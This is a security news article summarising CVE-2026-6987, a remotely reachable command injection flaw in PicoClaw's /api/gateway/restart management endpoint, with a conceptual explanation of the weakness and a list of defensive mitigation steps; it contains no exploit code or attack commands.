Search 10,000+ fixes & guides ⌘K Write a guide
News 3 min read

CVE-2026-6987 Command Injection Vulnerability Hits PicoClaw

5 minutes CVE-2026-6987 allows remote attackers to inject commands through PicoClaw’s restart API Featured image placeholder PicoClaw has a command injection flaw in versions up to 0.2.4, and the issue reaches the Web Launcher Management Plane through the /api/gateway/restart endpoint. The vulnerability is remotely reachable, which means an attacker who can contact that API may […]

uGetFix Editorial Team ·
0 Comments
5 minutes

CVE-2026-6987 allows remote attackers to inject commands through PicoClaw’s restart API

Featured image placeholder

PicoClaw has a command injection flaw in versions up to 0.2.4, and the issue reaches the Web Launcher Management Plane through the /api/gateway/restart endpoint. The vulnerability is remotely reachable, which means an attacker who can contact that API may manipulate requests and force the service to execute unintended system commands.

The first public record comes from the NVD entry for CVE-2026-6987, published on 2026-04-25, with a CVSS 7.3 high rating in the supplied source signal. The affected component is described as an unknown function inside the restart path, and the project had already been informed through an issue report but had not responded at the time of publication.

The weakness sits in a management-plane operation, which matters because restart functions often connect directly to system-level control. In this case, the API does not appear to treat all incoming data as safe before it reaches command execution logic, so a crafted request can change how the host interprets the restart action.

The source material also points to disagreement in scoring across advisory feeds, with different records showing different CVSS values and versions, but the central technical issue stays the same: a network-reachable command injection path in PicoClaw up to 0.2.4. The attack surface is the management API, not a local interface, and that makes exposure depend heavily on how broadly the endpoint is published.

Command injection flaws usually appear when application input is passed into a shell or command builder without enough neutralization. Here, the affected endpoint is tied to gateway restart behavior, so any user-controlled parameter that influences that logic can become a command separator, option, or additional instruction if it is not constrained correctly.

The fact that the vulnerable function is not documented in the supplied source makes the exact exploit path less specific, but the mechanism is still clear from the advisory text. Once untrusted input reaches command execution, the service can be steered into running attacker-supplied instructions with the privileges of the web process or the PicoClaw service account.

That risk is reinforced by the component name itself. A Web Launcher Management Plane is meant to expose administrative control, and restart functions are especially sensitive because they often sit close to operating-system actions rather than ordinary application logic. When that control path is network accessible, the security boundary depends on both input handling and access restrictions.

The provided material also notes that the issue is remote and that no response had arrived from the project when the issue report was filed. For operators, that leaves the vulnerable version range and exposed management endpoint as the immediate concern, especially where the API is reachable outside a trusted network.

Attackers use the restart endpoint to turn input into system commands

The vulnerable behavior is centered on the /api/gateway/restart file path, where request manipulation can trigger command injection in the management plane. The advisory describes an unknown function, but the impact is explicit: crafted input can alter command execution, and the attack can be launched remotely.

This kind of flaw usually depends on a downstream interpreter receiving user-controlled data without strict validation. The source material identifies CWE-77 and CWE-74, which both point to insufficient neutralization of special elements before data is consumed by another component.

The consequences extend beyond a single restart action. If the injected command runs with service privileges, it can affect confidentiality, integrity, and availability at the host level, and the supplied advisory text explicitly warns that the remote attacker may gain control over the underlying host or service.

Possible steps

Reduce exposure to CVE-2026-6987 by limiting access and removing public reachability.

  • Restrict access to /api/gateway/restart to trusted networks only.
  • Upgrade PicoClaw to a version after 0.2.4.
  • Remove public exposure of the Web Launcher Management Plane.
  • Monitor logs for unusual restart requests and command activity.
  • Review deployments for direct network reachability to the management API.
  • Track vendor and advisory updates for a published patch response.

Šaltiniai: nvd.nist.gov, codeant.ai, appsecure.security, GitHub Advisories, Feedly

Did this fix work for you?
uGetFix Editorial Team

Written by

uGetFix Editorial Team
Security Editor

The uGetFix editorial team consists of experienced Windows technicians and cybersecurity researchers. Every guide is tested on real hardware before publication.

7 guides published All articles →
0 Comments

Be the first to comment

Log in to post your comment
Log in to comment

Still worried? Run a free check.

Paste any URL or domain — we'll scan it against 4.2M known threats in 10 seconds.

View full scanner → Add to your website →